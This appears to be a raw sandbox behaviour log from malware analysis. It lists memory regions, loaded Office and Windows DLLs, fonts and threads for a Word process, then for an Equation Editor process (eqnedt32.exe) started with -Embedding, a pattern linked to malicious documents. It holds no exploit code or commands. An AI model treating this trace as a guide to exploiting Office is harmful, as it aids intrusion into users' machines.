entry_point = 0x7fef6d50000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\grooveex.dll") Region: id = 407 start_va = 0xada0000 end_va = 0xaf58fff entry_point = 0xada0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 408 start_va = 0xb090000 end_va = 0xb18ffff entry_point = 0x0 region_type = private name = "private_0x000000000b090000" filename = "" Region: id = 409 start_va = 0xb370000 end_va = 0xb46ffff entry_point = 0x0 region_type = private name = "private_0x000000000b370000" filename = "" Region: id = 410 start_va = 0x7fef6000000 end_va = 0x7fef6034fff entry_point = 0x7fef6000000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 411 start_va = 0x7fef6040000 end_va = 0x7fef68bdfff entry_point = 0x7fef6040000 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\grooveintlresource.dll") Region: id = 412 start_va = 0x7fffff74000 end_va = 0x7fffff75fff entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 413 start_va = 0x7fffff76000 end_va = 0x7fffff77fff entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 414 start_va = 0x7fef5f70000 end_va = 0x7fef5f7bfff entry_point = 0x7fef5f70000 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 415 start_va = 0x7fef5f80000 end_va = 0x7fef5ffdfff entry_point = 0x7fef5f80000 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 416 start_va = 0x2830000 end_va = 0x2831fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002830000" filename = "" Region: id = 417 start_va = 0x7fef5f60000 end_va = 0x7fef5f6efff entry_point = 0x7fef5f60000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 418 start_va = 0x7fef5ee0000 end_va = 0x7fef5f5ffff entry_point = 0x7fef5ee0000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 419 start_va = 0xb1b0000 end_va = 0xb2affff entry_point = 0x0 region_type = private name = "private_0x000000000b1b0000" filename = "" Region: id = 420 start_va = 0x7fefcdd0000 end_va = 0x7fefcdf2fff entry_point = 0x7fefcdd0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 421 start_va = 0x7fffff72000 end_va = 0x7fffff73fff entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 422 start_va = 0x310000 end_va = 0x312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 423 start_va = 0x340000 end_va = 0x340fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 424 start_va = 0x2440000 end_va = 0x2451fff entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 425 start_va = 0x2460000 end_va = 0x246efff entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 426 start_va = 0x2800000 end_va = 0x2811fff entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 427 start_va = 0x2820000 end_va = 0x2820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002820000" filename = "" Region: id = 428 start_va = 0x2840000 end_va = 0x2841fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002840000" filename = "" Region: id = 429 start_va = 0x2fc0000 end_va = 0x2fdefff entry_point = 0x0 region_type = private name = "private_0x0000000002fc0000" filename = "" Region: id = 430 start_va = 0x30f0000 end_va = 0x3137fff entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 431 start_va = 0x31c0000 end_va = 0x3207fff entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 432 start_va = 0x3210000 end_va = 0x322efff entry_point = 0x0 region_type = private name = "private_0x0000000003210000" filename = "" Region: id = 433 start_va = 0x3230000 end_va = 0x3230fff entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 434 start_va = 0x3360000 end_va = 0x337dfff entry_point = 0x0 region_type = private name = "private_0x0000000003360000" filename = "" Region: id = 435 start_va = 0x42d0000 end_va = 0x42eefff entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 436 start_va = 0x43f0000 end_va = 0x43f0fff entry_point = 0x0 region_type = private name = "private_0x00000000043f0000" filename = "" Region: id = 437 start_va = 0x4410000 end_va = 0x4410fff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 438 start_va = 0x4420000 end_va = 0x443efff entry_point = 0x0 region_type = private name = "private_0x0000000004420000" filename = "" Region: id = 439 start_va = 0x4470000 end_va = 0x4470fff entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 440 start_va = 0x4480000 end_va = 0x449efff entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 441 start_va = 0x44a0000 end_va = 0x44befff entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 442 start_va = 0x44d0000 end_va = 0x4533fff entry_point = 0x44d0000 region_type = mapped_file name = "seguisb.ttf" filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf") Region: id = 443 start_va = 0x4540000 end_va = 0x455efff entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 444 start_va = 0x46c0000 end_va = 0x46e0fff entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 445 start_va = 0x46f0000 end_va = 0x4720fff entry_point = 0x46f0000 region_type = mapped_file name = "c_936.nls" filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls") Region: id = 446 start_va = 0x7170000 end_va = 0x726ffff entry_point = 0x0 region_type = private name = "private_0x0000000007170000" filename = "" Region: id = 447 start_va = 0xb470000 end_va = 0xbc6ffff entry_point = 0x0 region_type = private name = "private_0x000000000b470000" filename = "" Region: id = 448 start_va = 0x7fee3e70000 end_va = 0x7fee3f29fff entry_point = 0x7fee3e70000 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\System32\\UIAutomationCore.dll" (normalized: "c:\\windows\\system32\\uiautomationcore.dll") Region: id = 449 start_va = 0x7fef1db0000 end_va = 0x7fef1e03fff entry_point = 0x7fef1db0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 450 start_va = 0x2850000 end_va = 0x2850fff entry_point = 0x2850000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 451 start_va = 0x4fe0000 end_va = 0x505ffff entry_point = 0x4fe0000 region_type = mapped_file name = "~wrf{84e77fc8-1a22-40fd-8cc4-0fcab13431a3}.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{84E77FC8-1A22-40FD-8CC4-0FCAB13431A3}.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.word\\~wrf{84e77fc8-1a22-40fd-8cc4-0fcab13431a3}.tmp") Region: id = 452 start_va = 0x7fef0e70000 end_va = 0x7fef0e86fff entry_point = 0x7fef0e70000 region_type = mapped_file name = "packager.dll" filename = "\\Windows\\System32\\packager.dll" (normalized: "c:\\windows\\system32\\packager.dll") Region: id = 948 start_va = 0x2860000 end_va = 0x2861fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 949 start_va = 0x2fe0000 end_va = 0x2fe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002fe0000" filename = "" Region: id = 950 start_va = 0x3240000 end_va = 0x3241fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003240000" filename = "" Region: id = 951 start_va = 0x3250000 end_va = 0x3250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003250000" filename = "" Region: id = 952 start_va = 0x5160000 end_va = 0x522dfff entry_point = 0x5160000 region_type = mapped_file name = "timesbd.ttf" filename = "\\Windows\\Fonts\\timesbd.ttf" (normalized: "c:\\windows\\fonts\\timesbd.ttf") Region: id = 953 start_va = 0xbc70000 end_va = 0xbd36fff entry_point = 0xbc70000 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 954 start_va = 0xbdf0000 end_va = 0xbeeffff entry_point = 0x0 region_type = private name = "private_0x000000000bdf0000" filename = "" Region: id = 955 start_va = 0xbef0000 end_va = 0xcd8dfff entry_point = 0xbef0000 region_type = mapped_file name = "simsun.ttc" filename = "\\Windows\\Fonts\\simsun.ttc" (normalized: "c:\\windows\\fonts\\simsun.ttc") Region: id = 956 start_va = 0xcd90000 end_va = 0xce5bfff entry_point = 0xcd90000 region_type = mapped_file name = "times.ttf" filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf") Region: id = 957 start_va = 0xce60000 end_va = 0xd311fff entry_point = 0x0 region_type = private name = "private_0x000000000ce60000" filename = "" Region: id = 958 start_va = 0x77250000 end_va = 0x77252fff entry_point = 0x77250000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 959 start_va = 0x7fef47a0000 end_va = 0x7fef47abfff entry_point = 0x7fef47a0000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 960 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 1047 start_va = 0x4460000 end_va = 0x4461fff entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 1048 start_va = 0x4570000 end_va = 0x4571fff entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 1049 start_va = 0x46a0000 end_va = 0x46a1fff entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 1050 start_va = 0x4730000 end_va = 0x4731fff entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 1051 start_va = 0x4750000 end_va = 0x4751fff entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 1052 start_va = 0x6840000 end_va = 0x6841fff entry_point = 0x0 region_type = private name = "private_0x0000000006840000" filename = "" Region: id = 1053 start_va = 0x6960000 end_va = 0x6961fff entry_point = 0x0 region_type = private name = "private_0x0000000006960000" filename = "" Region: id = 1054 start_va = 0x6980000 end_va = 0x6981fff entry_point = 0x0 region_type = private name = "private_0x0000000006980000" filename = "" Region: id = 1055 start_va = 0x6ba0000 end_va = 0x6ba1fff entry_point = 0x0 region_type = private name = "private_0x0000000006ba0000" filename = "" Region: id = 1056 start_va = 0x8a90000 end_va = 0x8b46fff entry_point = 0x8a90000 region_type = mapped_file name = "arialbd.ttf" filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf") Region: id = 1057 start_va = 0xb2b0000 end_va = 0xb35afff entry_point = 0xb2b0000 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 1058 start_va = 0xce60000 end_va = 0xd21ffff entry_point = 0x0 region_type = private name = "private_0x000000000ce60000" filename = "" Region: id = 1059 start_va = 0xd480000 end_va = 0xd57ffff entry_point = 0x0 region_type = private name = "private_0x000000000d480000" filename = "" Region: id = 1060 start_va = 0xe7f0000 end_va = 0xe9effff entry_point = 0x0 region_type = private name = "private_0x000000000e7f0000" filename = "" Region: id = 1061 start_va = 0x7fee3e10000 end_va = 0x7fee3e63fff entry_point = 0x7fee3e10000 region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\msproof7.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msproof7.dll") Region: id = 1062 start_va = 0x7fee3d80000 end_va = 0x7fee3e0cfff entry_point = 0x7fee3d80000 region_type = mapped_file name = "msgr8en.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\1033\\MSGR8EN.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\1033\\msgr8en.dll") Region: id = 1063 start_va = 0x2e40000 end_va = 0x2e41fff entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 1064 start_va = 0x2fc0000 end_va = 0x2fc1fff entry_point = 0x0 region_type = private name = "private_0x0000000002fc0000" filename = "" Region: id = 1065 start_va = 0x3210000 end_va = 0x3211fff entry_point = 0x0 region_type = private name = "private_0x0000000003210000" filename = "" Region: id = 1066 start_va = 0x3360000 end_va = 0x3361fff entry_point = 0x0 region_type = private name = "private_0x0000000003360000" filename = "" Region: id = 1067 start_va = 0x3380000 end_va = 0x3381fff entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 1068 start_va = 0x42d0000 end_va = 0x42d1fff entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 1069 start_va = 0x43f0000 end_va = 0x43f1fff entry_point = 0x0 region_type = private name = "private_0x00000000043f0000" filename = "" Region: id = 1070 start_va = 0x4410000 end_va = 0x4411fff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 1071 start_va = 0x4430000 end_va = 0x4431fff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 1072 start_va = 0x8b50000 end_va = 0x8c11fff entry_point = 0x8b50000 region_type = mapped_file name = "cambriab.ttf" filename = "\\Windows\\Fonts\\cambriab.ttf" (normalized: "c:\\windows\\fonts\\cambriab.ttf") Region: id = 1073 start_va = 0x8c20000 end_va = 0x8dacfff entry_point = 0x8c20000 region_type = mapped_file name = "cambria.ttc" filename = "\\Windows\\Fonts\\cambria.ttc" (normalized: "c:\\windows\\fonts\\cambria.ttc") Region: id = 1074 start_va = 0x8db0000 end_va = 0x8e51fff entry_point = 0x8db0000 region_type = mapped_file name = "timesi.ttf" filename = "\\Windows\\Fonts\\timesi.ttf" (normalized: "c:\\windows\\fonts\\timesi.ttf") Region: id = 1075 start_va = 0x7fee3cb0000 end_va = 0x7fee3d7cfff entry_point = 0x7fee3cb0000 region_type = mapped_file name = "msspell7.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msspell7.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msspell7.dll") Region: id = 1076 start_va = 0x7fee3a80000 end_va = 0x7fee3b15fff entry_point = 0x7fee3a80000 region_type = mapped_file name = "mscss7en.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\mscss7en.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7en.dll") Region: id = 1077 start_va = 0x7fee3b20000 end_va = 0x7fee3ca7fff entry_point = 0x7fee3b20000 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7en.lex") Region: id = 1078 start_va = 0x7fee39e0000 end_va = 0x7fee3a79fff entry_point = 0x7fee39e0000 region_type = mapped_file name = "css7data0009.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\CSS7DATA0009.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\css7data0009.dll") Region: id = 1079 start_va = 0x7fefb220000 end_va = 0x7fefb22bfff entry_point = 0x7fefb220000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Thread: id = 1 os_tid = 0xa5c Thread: id = 2 os_tid = 0xa58 Thread: id = 3 os_tid = 0xa54 Thread: id = 4 os_tid = 0xa50 Thread: id = 5 os_tid = 0xa4c Thread: id = 6 os_tid = 0xa48 Thread: id = 7 os_tid = 0xa44 Thread: id = 8 os_tid = 0xa2c Thread: id = 9 os_tid = 0xa20 Thread: id = 10 os_tid = 0xa1c Thread: id = 11 os_tid = 0xa18 Thread: id = 12 os_tid = 0xa14 Thread: id = 13 os_tid = 0xa10 Thread: id = 14 os_tid = 0xa88 Thread: id = 15 os_tid = 0xa8c Thread: id = 16 os_tid = 0xa90 Thread: id = 17 os_tid = 0xa94 Thread: id = 18 os_tid = 0xa98 Thread: id = 19 os_tid = 0xa9c Thread: id = 20 os_tid = 0xaa4 Thread: id = 21 os_tid = 0xaa8 Thread: id = 22 os_tid = 0xaac Thread: id = 49 os_tid = 0xb64 Process: id = "2" image_name = "eqnedt32.exe" filename = "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\eqnedt32.exe" page_root = "0x54ab7000" os_pid = "0xacc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0xa0c" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010636" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 453 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 454 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 455 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 456 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 457 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 458 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 459 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 460 start_va = 0x400000 end_va = 0x48dfff entry_point = 0x400000 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 461 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 462 start_va = 0x77270000 end_va = 0x773effff entry_point = 0x77270000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 463 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 464 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 465 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 466 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 467 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 468 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 469 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 470 start_va = 0x2a0000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 471 start_va = 0x74b00000 end_va = 0x74b07fff entry_point = 0x74b00000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 472 start_va = 0x74b10000 end_va = 0x74b6bfff entry_point = 0x74b10000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 473 start_va = 0x74b70000 end_va = 0x74baefff entry_point = 0x74b70000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 474 start_va = 0x580000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 475 start_va = 0x75250000 end_va = 0x75295fff entry_point = 0x75250000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 476 start_va = 0x759f0000 end_va = 0x75afffff entry_point = 0x759f0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 477 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x0 region_type = private name = "private_0x0000000076e70000" filename = "" Region: id = 478 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x0 region_type = private name = "private_0x0000000076f70000" filename = "" Region: id = 479 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 480 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 481 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 482 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 483 start_va = 0x746f0000 end_va = 0x74773fff entry_point = 0x746f0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 484 start_va = 0x74780000 end_va = 0x7484afff entry_point = 0x74780000 region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 485 start_va = 0x74850000 end_va = 0x74a04fff entry_point = 0x74850000 region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 486 start_va = 0x74c10000 end_va = 0x74c1afff entry_point = 0x74c10000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 487 start_va = 0x74c20000 end_va = 0x74c36fff entry_point = 0x74c20000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 488 start_va = 0x74c40000 end_va = 0x74ca4fff entry_point = 0x74c40000 region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 489 start_va = 0x74dc0000 end_va = 0x74dcbfff entry_point = 0x74dc0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 490 start_va = 0x74dd0000 end_va = 0x74e2ffff entry_point = 0x74dd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 491 start_va = 0x74e90000 end_va = 0x74ea8fff entry_point = 0x74e90000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 492 start_va = 0x750d0000 end_va = 0x75126fff entry_point = 0x750d0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 493 start_va = 0x75130000 end_va = 0x751bffff entry_point = 0x75130000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 494 start_va = 0x752a0000 end_va = 0x7534bfff entry_point = 0x752a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 495 start_va = 0x75450000 end_va = 0x755abfff entry_point = 0x75450000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 496 start_va = 0x755b0000 end_va = 0x7564cfff entry_point = 0x755b0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 497 start_va = 0x756e0000 end_va = 0x7577ffff entry_point = 0x756e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 498 start_va = 0x75780000 end_va = 0x75789fff entry_point = 0x75780000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 499 start_va = 0x75790000 end_va = 0x7588ffff entry_point = 0x75790000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 500 start_va = 0x75c50000 end_va = 0x76899fff entry_point = 0x75c50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 501 start_va = 0x76d80000 end_va = 0x76e6ffff entry_point = 0x76d80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 502 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 503 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 504 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 505 start_va = 0x680000 end_va = 0x807fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 506 start_va = 0x74e30000 end_va = 0x74e8ffff entry_point = 0x74e30000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" 